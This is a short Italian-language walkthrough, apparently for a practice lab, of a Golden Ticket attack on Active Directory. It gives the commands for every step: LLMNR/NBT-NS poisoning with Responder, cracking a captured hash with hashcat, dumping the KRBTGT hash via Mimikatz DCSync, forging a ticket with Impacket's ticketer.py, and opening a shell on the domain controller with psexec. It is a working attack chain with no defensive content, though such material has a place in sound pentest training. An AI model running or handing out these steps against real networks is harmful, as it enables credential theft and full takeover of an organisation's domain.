
Obiettivo: Ottenere un Golden Ticket per impersonare un amministratore di dominio in un ambiente Active Directory.
Strumenti necessari:
Impacket (su Kali Linux)
Mimikatz (su Windows)
Active Directory lab (es. Windows Server 2019 + Windows 10 client)
Procedura dettagliata:
Fase 1: Dump delle credenziali
Compromettere un account di dominio (es. tramite LLMNR/NBT-NS Poisoning con
Responder
):responder -I eth0 -wrf
Ottenere un hash NTLM e crackarlo con
hashcat
:hashcat -m 5600 hash.txt rockyou.txt
Fase 2: Estrazione del KRBTGT Hash
Usare Mimikatz su una macchina compromessa:
mimikatz # lsadump::dcsync /domain:lab.local /user:krbtgt
Salvare l’hash NTLM del KRBTGT.
Fase 3: Generazione del Golden Ticket
Usare Impacket su Kali:
python ticketer.py -nthash <KRBTGT-NTLM-HASH> -domain-sid <SID> -domain lab.local Administrator
Esportare il ticket:
export KRB5CCNAME=Administrator.ccache
Fase 4: Accesso come Amministratore
Usare psexec per ottenere una shell:
python psexec.py -k -no-pass LAB-DC.lab.local